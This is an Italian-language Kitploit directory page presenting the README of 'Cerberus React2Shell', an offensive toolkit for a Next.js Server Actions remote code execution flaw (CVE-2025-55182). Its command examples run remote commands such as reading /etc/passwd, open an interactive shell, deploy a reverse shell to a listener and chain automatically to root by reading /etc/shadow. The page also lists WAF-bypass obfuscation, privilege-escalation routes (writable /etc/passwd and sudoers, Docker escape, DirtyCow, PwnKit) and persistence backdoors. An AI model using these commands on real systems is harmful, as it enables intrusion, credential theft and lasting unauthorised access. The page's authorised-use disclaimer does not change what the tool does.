Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Cerberus-React2Shell-Scanner-Exploit — Toolkit di sfruttamento elite per CVE-2025-55182 (RCE su React Server Components). Payload polimorfici asincroni, bypass avanzato di WAF/CDN, rotazione proxy, scansione di massa Shodan/Censys, auto-pwn + reverse shell, template Nuclei, laboratorio K8s e dashboard C2. Autore: Sudeepa Wanigarathna – strettamente per red team autorizzati e penetration testing. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
Frameworks per Penetration TestingEscalation di PrivilegiScanner di VulnerabilitàFramework di ExploitShellcodeSfruttamento di Applicazioni WebPost-ExploitCommand and ControlApprendimento e Formazione
Red Teaming
Sviluppo Payload
Lab e Pratica
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

Vedi Repository
21817 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Toolkit di sfruttamento elite per CVE-2025-55182 (RCE su React Server Components). Payload polimorfici asincroni, bypass avanzato di WAF/CDN, rotazione proxy, scansione di massa Shodan/Censys, auto-pwn + reverse shell, template Nuclei, laboratorio K8s e dashboard C2. Autore: Sudeepa Wanigarathna – strettamente per red team autorizzati e penetration testing.

Condividi

Cerberus React2Shell - Framework di Sfruttamento Weaponizzato

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 Panoramica

Framework di sfruttamento di livello professionale per la vulnerabilità RCE delle Server Actions di Next.js (React2Shell). Dimostra la catena di attacco completa dall'accesso iniziale all'escalation dei privilegi di root.

Capacità:

  • ✅ Rilevamento automatico delle vulnerabilità
  • ✅ Esecuzione remota di codice (RCE)
  • ✅ Accesso a shell interattiva
  • ✅ Enumerazione del sistema Linux
  • ✅ Escalation automatica dei privilegi
  • ✅ Distribuzione di reverse shell
  • ✅ Upload/download di file
  • ✅ Dimostrazione dell'accesso root

🚀 Avvio Rapido

RCE di Base

root@kitploit:~
# Verifica vulnerabilità
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Esegui comando
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

Shell Interattiva

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

Catena di Attacco Automatica Completa

root@kitploit:~
# Sfruttamento completo: RCE → Enumerazione → Accesso Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 Struttura del Framework

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # Motore di exploit principale (400+ righe)
├── demo_exploit.py              # Catena di attacco automatica (290+ righe)
├── interactive_shell.py         # Shell interattiva (280+ righe)
├── reverse_shell_handler.py     # Listener reverse shell (180+ righe)
├── post_exploit/
│   ├── linux_enum.py           # Enumerazione del sistema (330+ righe)
│   ├── priv_esc.py             # Escalation dei privilegi (320+ righe)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # Documentazione completa d'uso
├── QUICKSTART.md                # Riferimento rapido
└── BANNER.txt

🔥 Funzionalità

Motore di Exploit Principale

  • Scoperta ID Azione: Estrazione automatica dai bundle JavaScript
  • Payload Multipli: varianti execSync, spawn, eval, mainModule
  • Estrazione Output: Analisi dell'output dei comandi dalle risposte di errore
  • Bypass WAF: Tecniche di offuscamento dei payload

Post-Sfruttamento

  • Enumerazione Linux: binari SUID/SGID, percorsi scrivibili, cron job, versione del kernel
  • Escalation dei Privilegi: GTFOBins, file /etc scrivibili, fuga Docker, capabilities
  • Operazioni sui File: Upload/download con codifica base64
  • Persistenza: Molteplici metodi di backdoor

Strumenti Interattivi

  • Shell Interattiva: Esecuzione di comandi in tempo reale con comandi integrati
  • Reverse Shell: Molteplici tipi di shell (bash, python, nc, perl)
  • Modalità Demo: Dimostrazione automatica in 6 passaggi

📖 Esempi di Utilizzo

1. Comandi di Base

root@kitploit:~
# Verifica vulnerabilità
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Esegui comandi
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# Diverse varianti di payload
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# Con offuscamento
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. Shell Interattiva

root@kitploit:~
# Avvia shell
python3 interactive_shell.py --target http://127.0.0.1:3000

# Comandi disponibili:
# - execute <cmd>        : Esegui comando shell
# - enum                 : Esegui enumerazione completa
# - escalate             : Tenta escalation dei privilegi
# - upload <local> <remote>  : Carica file
# - download <remote> <local>: Scarica file
# - shell <lhost> <lport>: Distribuisci reverse shell
# - info                 : Mostra informazioni sessione
# - exit                 : Esci

3. Reverse Shell

root@kitploit:~
# Terminale 1: Avvia listener
python3 reverse_shell_handler.py --lport 4444

# Terminale 2: Distribuisci shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. Demo Automatica

root@kitploit:~
# Catena completa: Scoperta → RCE → Enumerazione → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 Catena di Attacco

Il framework implementa una catena di sfruttamento completa in 6 passaggi:

  1. Scoperta - Estrae gli ID delle Server Actions dai bundle JavaScript
  2. Sfruttamento - Trova un ID Azione funzionante e ottiene RCE
  3. Verifica - Conferma l'esecuzione del codice con il comando id
  4. Enumerazione - Raccoglie informazioni sul sistema, binari SUID, percorsi scrivibili
  5. Escalation - Sfrutta automaticamente i vettori di escalation dei privilegi
  6. Dimostrazione - Prova l'accesso root leggendo /etc/shadow e elencando /root

🛡️ Tecniche di Escalation dei Privilegi

Metodi Implementati

  1. Binari SUID (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. File /etc Scrivibili

    • /etc/passwd - Aggiungi nuovo utente root
    • /etc/shadow - Azzera la password di root
    • /etc/sudoers - Concedi sudo NOPASSWD
  3. Fuga Docker

    • Sfruttamento del socket Docker accessibile
    • Rottura del container privilegiato
  4. Exploit del Kernel

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Capabilities Linux

    • Sfruttamento di CAP_SETUID, CAP_DAC_OVERRIDE

📊 Statistiche

  • Totale Righe di Codice: 1.800+
  • Moduli: 8
  • Tecniche di Escalation dei Privilegi: 5
  • Varianti di Payload: 4
  • Tipi di Shell: 4 (bash, python, nc, perl)

⚙️ Requisiti

root@kitploit:~
pip install -r requirements.txt

Dipendenze:

  • requests
  • colorama

📚 Documentazione

  • EXPLOITATION_GUIDE.md - Guida completa all'uso con esempi
  • QUICKSTART.md - Riferimento rapido per i comandi comuni

⚠️ Disclaimer

AVVERTENZA: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Utilizzare solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione scritta per il test.

L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Utilizzo a proprio rischio.

🎓 Scopo Educativo

Questo framework è progettato per:

  • Ricercatori di sicurezza che studiano le vulnerabilità di Next.js
  • Penetration tester con autorizzazione
  • Formazione sulla sicurezza e sfide CTF
  • Ricerca sulle vulnerabilità in ambienti di laboratorio controllati

📄 Licenza

Licenza MIT (Solo a Scopi Educativi)

👤 Autore

Sudeepa Wanigarathna

  • Esperto nello Sviluppo di Exploit
  • Ricercatore di Sicurezza
  • Penetration Tester

Versione: 1.0
Ultimo Aggiornamento: Dicembre 2025

Per istruzioni dettagliate sull'uso, consultare EXPLOITATION_GUIDE.md

Scarica lo strumento